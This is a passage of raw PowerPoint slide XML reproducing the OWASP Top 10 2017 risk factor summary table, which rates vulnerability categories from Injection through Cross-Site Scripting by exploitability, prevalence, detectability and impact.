              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2859086" y="8229600"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>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Table 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3090365402"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="1295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43850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Top 10 Risk Factor Summary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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9515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latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Aria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68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3057930399"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2209800"/>
          <a:ext cx="6842248" cy="4223373"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1217284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1106043">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="414000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="618423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RISK</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b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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b="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b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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b="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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sz="950" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Score</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362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A1:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Injection</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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>COMMON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baseline="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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>8.0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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A2:2017-Authentication</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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>COMMON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baseline="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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>7.0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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0"/>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Sens.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> Data Exposure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>WIDESPREAD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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>7.0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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017-XML External Entity (XXE)</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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>AVERAGE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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>COMMON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baseline="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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="9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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>7.0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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A5:2017-Broken Access Control</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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>AVERAGE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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chemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>AVERAGE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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chemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SEVERE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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ct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>App</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" dirty="0">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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>6.0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34400579"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="287988">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900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>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baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>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dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>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dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>6.0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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>A7:2017-Cross-Site Scripting (XSS)</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rgbClr val="FFFFFF"/>
                          </a:solidFill>
